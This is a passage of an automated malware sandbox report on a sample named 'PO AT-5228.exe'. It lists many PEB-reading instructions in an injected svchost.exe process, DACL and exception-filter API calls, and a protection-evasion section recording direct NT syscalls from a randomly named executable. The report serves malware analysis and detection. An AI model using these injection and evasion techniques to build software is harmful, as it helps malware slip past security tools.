Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E545B1 mov eax, dword ptr fs:[00000030h] | 1_2_02E545B1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E32582 mov eax, dword ptr fs:[00000030h] | 1_2_02E32582
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E32582 mov ecx, dword ptr fs:[00000030h] | 1_2_02E32582
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E64588 mov eax, dword ptr fs:[00000030h] | 1_2_02E64588
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E6E59C mov eax, dword ptr fs:[00000030h] | 1_2_02E6E59C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E6656A mov eax, dword ptr fs:[00000030h] | 1_2_02E6656A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E6656A mov eax, dword ptr fs:[00000030h] | 1_2_02E6656A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E6656A mov eax, dword ptr fs:[00000030h] | 1_2_02E6656A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E38550 mov eax, dword ptr fs:[00000030h] | 1_2_02E38550
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E38550 mov eax, dword ptr fs:[00000030h] | 1_2_02E38550
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E40535 mov eax, dword ptr fs:[00000030h] | 1_2_02E40535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E40535 mov eax, dword ptr fs:[00000030h] | 1_2_02E40535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E40535 mov eax, dword ptr fs:[00000030h] | 1_2_02E40535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E40535 mov eax, dword ptr fs:[00000030h] | 1_2_02E40535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E40535 mov eax, dword ptr fs:[00000030h] | 1_2_02E40535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E40535 mov eax, dword ptr fs:[00000030h] | 1_2_02E40535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E5E53E mov eax, dword ptr fs:[00000030h] | 1_2_02E5E53E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E5E53E mov eax, dword ptr fs:[00000030h] | 1_2_02E5E53E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E5E53E mov eax, dword ptr fs:[00000030h] | 1_2_02E5E53E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E5E53E mov eax, dword ptr fs:[00000030h] | 1_2_02E5E53E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E5E53E mov eax, dword ptr fs:[00000030h] | 1_2_02E5E53E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EC6500 mov eax, dword ptr fs:[00000030h] | 1_2_02EC6500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F04500 mov eax, dword ptr fs:[00000030h] | 1_2_02F04500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F04500 mov eax, dword ptr fs:[00000030h] | 1_2_02F04500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F04500 mov eax, dword ptr fs:[00000030h] | 1_2_02F04500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F04500 mov eax, dword ptr fs:[00000030h] | 1_2_02F04500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F04500 mov eax, dword ptr fs:[00000030h] | 1_2_02F04500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F04500 mov eax, dword ptr fs:[00000030h] | 1_2_02F04500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F04500 mov eax, dword ptr fs:[00000030h] | 1_2_02F04500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E6AAEE mov eax, dword ptr fs:[00000030h] | 1_2_02E6AAEE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E6AAEE mov eax, dword ptr fs:[00000030h] | 1_2_02E6AAEE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E86ACC mov eax, dword ptr fs:[00000030h] | 1_2_02E86ACC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E86ACC mov eax, dword ptr fs:[00000030h] | 1_2_02E86ACC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E86ACC mov eax, dword ptr fs:[00000030h] | 1_2_02E86ACC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E30AD0 mov eax, dword ptr fs:[00000030h] | 1_2_02E30AD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E64AD0 mov eax, dword ptr fs:[00000030h] | 1_2_02E64AD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E64AD0 mov eax, dword ptr fs:[00000030h] | 1_2_02E64AD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E38AA0 mov eax, dword ptr fs:[00000030h] | 1_2_02E38AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E38AA0 mov eax, dword ptr fs:[00000030h] | 1_2_02E38AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E86AA4 mov eax, dword ptr fs:[00000030h] | 1_2_02E86AA4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E3EA80 mov eax, dword ptr fs:[00000030h] | 1_2_02E3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E3EA80 mov eax, dword ptr fs:[00000030h] | 1_2_02E3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E3EA80 mov eax, dword ptr fs:[00000030h] | 1_2_02E3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E3EA80 mov eax, dword ptr fs:[00000030h] | 1_2_02E3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E3EA80 mov eax, dword ptr fs:[00000030h] | 1_2_02E3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E3EA80 mov eax, dword ptr fs:[00000030h] | 1_2_02E3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E3EA80 mov eax, dword ptr fs:[00000030h] | 1_2_02E3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E3EA80 mov eax, dword ptr fs:[00000030h] | 1_2_02E3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E3EA80 mov eax, dword ptr fs:[00000030h] | 1_2_02E3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F04A80 mov eax, dword ptr fs:[00000030h] | 1_2_02F04A80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E68A90 mov edx, dword ptr fs:[00000030h] | 1_2_02E68A90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E6CA6F mov eax, dword ptr fs:[00000030h] | 1_2_02E6CA6F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E6CA6F mov eax, dword ptr fs:[00000030h] | 1_2_02E6CA6F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E6CA6F mov eax, dword ptr fs:[00000030h] | 1_2_02E6CA6F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EDEA60 mov eax, dword ptr fs:[00000030h] | 1_2_02EDEA60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EACA72 mov eax, dword ptr fs:[00000030h] | 1_2_02EACA72
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EACA72 mov eax, dword ptr fs:[00000030h] | 1_2_02EACA72
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E36A50 mov eax, dword ptr fs:[00000030h] | 1_2_02E36A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E36A50 mov eax, dword ptr fs:[00000030h] | 1_2_02E36A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E36A50 mov eax, dword ptr fs:[00000030h] | 1_2_02E36A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E36A50 mov eax, dword ptr fs:[00000030h] | 1_2_02E36A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E36A50 mov eax, dword ptr fs:[00000030h] | 1_2_02E36A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E36A50 mov eax, dword ptr fs:[00000030h] | 1_2_02E36A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E36A50 mov eax, dword ptr fs:[00000030h] | 1_2_02E36A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E40A5B mov eax, dword ptr fs:[00000030h] | 1_2_02E40A5B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E40A5B mov eax, dword ptr fs:[00000030h] | 1_2_02E40A5B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E6CA24 mov eax, dword ptr fs:[00000030h] | 1_2_02E6CA24
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E5EA2E mov eax, dword ptr fs:[00000030h] | 1_2_02E5EA2E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E54A35 mov eax, dword ptr fs:[00000030h] | 1_2_02E54A35
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E54A35 mov eax, dword ptr fs:[00000030h] | 1_2_02E54A35
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EBCA11 mov eax, dword ptr fs:[00000030h] | 1_2_02EBCA11
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E38BF0 mov eax, dword ptr fs:[00000030h] | 1_2_02E38BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E38BF0 mov eax, dword ptr fs:[00000030h] | 1_2_02E38BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E38BF0 mov eax, dword ptr fs:[00000030h] | 1_2_02E38BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E5EBFC mov eax, dword ptr fs:[00000030h] | 1_2_02E5EBFC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EBCBF0 mov eax, dword ptr fs:[00000030h] | 1_2_02EBCBF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E50BCB mov eax, dword ptr fs:[00000030h] | 1_2_02E50BCB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E50BCB mov eax, dword ptr fs:[00000030h] | 1_2_02E50BCB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E50BCB mov eax, dword ptr fs:[00000030h] | 1_2_02E50BCB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E30BCD mov eax, dword ptr fs:[00000030h] | 1_2_02E30BCD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E30BCD mov eax, dword ptr fs:[00000030h] | 1_2_02E30BCD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E30BCD mov eax, dword ptr fs:[00000030h] | 1_2_02E30BCD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EDEBD0 mov eax, dword ptr fs:[00000030h] | 1_2_02EDEBD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E40BBE mov eax, dword ptr fs:[00000030h] | 1_2_02E40BBE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E40BBE mov eax, dword ptr fs:[00000030h] | 1_2_02E40BBE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EE4BB0 mov eax, dword ptr fs:[00000030h] | 1_2_02EE4BB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EE4BB0 mov eax, dword ptr fs:[00000030h] | 1_2_02EE4BB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E2CB7E mov eax, dword ptr fs:[00000030h] | 1_2_02E2CB7E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EE4B4B mov eax, dword ptr fs:[00000030h] | 1_2_02EE4B4B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EE4B4B mov eax, dword ptr fs:[00000030h] | 1_2_02EE4B4B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F02B57 mov eax, dword ptr fs:[00000030h] | 1_2_02F02B57
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F02B57 mov eax, dword ptr fs:[00000030h] | 1_2_02F02B57
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F02B57 mov eax, dword ptr fs:[00000030h] | 1_2_02F02B57
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F02B57 mov eax, dword ptr fs:[00000030h] | 1_2_02F02B57
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EC6B40 mov eax, dword ptr fs:[00000030h] | 1_2_02EC6B40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EC6B40 mov eax, dword ptr fs:[00000030h] | 1_2_02EC6B40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EFAB40 mov eax, dword ptr fs:[00000030h] | 1_2_02EFAB40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02ED8B42 mov eax, dword ptr fs:[00000030h] | 1_2_02ED8B42
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E28B50 mov eax, dword ptr fs:[00000030h] | 1_2_02E28B50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EDEB50 mov eax, dword ptr fs:[00000030h] | 1_2_02EDEB50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E5EB20 mov eax, dword ptr fs:[00000030h] | 1_2_02E5EB20
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E5EB20 mov eax, dword ptr fs:[00000030h] | 1_2_02E5EB20
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EF8B28 mov eax, dword ptr fs:[00000030h] | 1_2_02EF8B28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EF8B28 mov eax, dword ptr fs:[00000030h] | 1_2_02EF8B28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F04B00 mov eax, dword ptr fs:[00000030h] | 1_2_02F04B00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EAEB1D mov eax, dword ptr fs:[00000030h] | 1_2_02EAEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EAEB1D mov eax, dword ptr fs:[00000030h] | 1_2_02EAEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EAEB1D mov eax, dword ptr fs:[00000030h] | 1_2_02EAEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EAEB1D mov eax, dword ptr fs:[00000030h] | 1_2_02EAEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EAEB1D mov eax, dword ptr fs:[00000030h] | 1_2_02EAEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EAEB1D mov eax, dword ptr fs:[00000030h] | 1_2_02EAEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EAEB1D mov eax, dword ptr fs:[00000030h] | 1_2_02EAEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EAEB1D mov eax, dword ptr fs:[00000030h] | 1_2_02EAEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EAEB1D mov eax, dword ptr fs:[00000030h] | 1_2_02EAEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EFA8E4 mov eax, dword ptr fs:[00000030h] | 1_2_02EFA8E4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E6C8F9 mov eax, dword ptr fs:[00000030h] | 1_2_02E6C8F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E6C8F9 mov eax, dword ptr fs:[00000030h] | 1_2_02E6C8F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E5E8C0 mov eax, dword ptr fs:[00000030h] | 1_2_02E5E8C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02F008C0 mov eax, dword ptr fs:[00000030h] | 1_2_02F008C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E30887 mov eax, dword ptr fs:[00000030h] | 1_2_02E30887
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EBC89D mov eax, dword ptr fs:[00000030h] | 1_2_02EBC89D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EBE872 mov eax, dword ptr fs:[00000030h] | 1_2_02EBE872
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EBE872 mov eax, dword ptr fs:[00000030h] | 1_2_02EBE872
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EC6870 mov eax, dword ptr fs:[00000030h] | 1_2_02EC6870
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EC6870 mov eax, dword ptr fs:[00000030h] | 1_2_02EC6870
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E42840 mov ecx, dword ptr fs:[00000030h] | 1_2_02E42840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E60854 mov eax, dword ptr fs:[00000030h] | 1_2_02E60854
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E34859 mov eax, dword ptr fs:[00000030h] | 1_2_02E34859
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E34859 mov eax, dword ptr fs:[00000030h] | 1_2_02E34859
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E52835 mov eax, dword ptr fs:[00000030h] | 1_2_02E52835
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E52835 mov eax, dword ptr fs:[00000030h] | 1_2_02E52835
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E52835 mov eax, dword ptr fs:[00000030h] | 1_2_02E52835
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E52835 mov ecx, dword ptr fs:[00000030h] | 1_2_02E52835
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E52835 mov eax, dword ptr fs:[00000030h] | 1_2_02E52835
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E52835 mov eax, dword ptr fs:[00000030h] | 1_2_02E52835
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E6A830 mov eax, dword ptr fs:[00000030h] | 1_2_02E6A830
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02ED483A mov eax, dword ptr fs:[00000030h] | 1_2_02ED483A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02ED483A mov eax, dword ptr fs:[00000030h] | 1_2_02ED483A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EBC810 mov eax, dword ptr fs:[00000030h] | 1_2_02EBC810
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EBE9E0 mov eax, dword ptr fs:[00000030h] | 1_2_02EBE9E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E629F9 mov eax, dword ptr fs:[00000030h] | 1_2_02E629F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E629F9 mov eax, dword ptr fs:[00000030h] | 1_2_02E629F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EC69C0 mov eax, dword ptr fs:[00000030h] | 1_2_02EC69C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E3A9D0 mov eax, dword ptr fs:[00000030h] | 1_2_02E3A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E3A9D0 mov eax, dword ptr fs:[00000030h] | 1_2_02E3A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E3A9D0 mov eax, dword ptr fs:[00000030h] | 1_2_02E3A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E3A9D0 mov eax, dword ptr fs:[00000030h] | 1_2_02E3A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E3A9D0 mov eax, dword ptr fs:[00000030h] | 1_2_02E3A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E3A9D0 mov eax, dword ptr fs:[00000030h] | 1_2_02E3A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E649D0 mov eax, dword ptr fs:[00000030h] | 1_2_02E649D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EFA9D3 mov eax, dword ptr fs:[00000030h] | 1_2_02EFA9D3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h] | 1_2_02E429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h] | 1_2_02E429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h] | 1_2_02E429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h] | 1_2_02E429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h] | 1_2_02E429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h] | 1_2_02E429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h] | 1_2_02E429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h] | 1_2_02E429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h] | 1_2_02E429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h] | 1_2_02E429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h] | 1_2_02E429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h] | 1_2_02E429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h] | 1_2_02E429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E309AD mov eax, dword ptr fs:[00000030h] | 1_2_02E309AD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E309AD mov eax, dword ptr fs:[00000030h] | 1_2_02E309AD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EB89B3 mov esi, dword ptr fs:[00000030h] | 1_2_02EB89B3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EB89B3 mov eax, dword ptr fs:[00000030h] | 1_2_02EB89B3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02EB89B3 mov eax, dword ptr fs:[00000030h] | 1_2_02EB89B3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E56962 mov eax, dword ptr fs:[00000030h] | 1_2_02E56962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E56962 mov eax, dword ptr fs:[00000030h] | 1_2_02E56962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E56962 mov eax, dword ptr fs:[00000030h] | 1_2_02E56962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E7096E mov eax, dword ptr fs:[00000030h] | 1_2_02E7096E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E7096E mov edx, dword ptr fs:[00000030h] | 1_2_02E7096E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02E7096E mov eax, dword ptr fs:[00000030h] | 1_2_02E7096E
Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B9A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, | 0_2_00B9A66C
Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B881AC SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_00B881AC
Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B88189 SetUnhandledExceptionFilter, | 0_2_00B88189

                HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtCreateKey: Direct from: 0x76F02C6C
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtSetInformationThread: Direct from: 0x76F02B4C
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtOpenSection: Direct from: 0x76F02E0C
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtSetInformationThread: Direct from: 0x76EF63F9
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtCreateFile: Direct from: 0x76F02FEC
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtOpenFile: Direct from: 0x76F02DCC
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | NtTerminateThread: Direct from: 0x76F02FCC
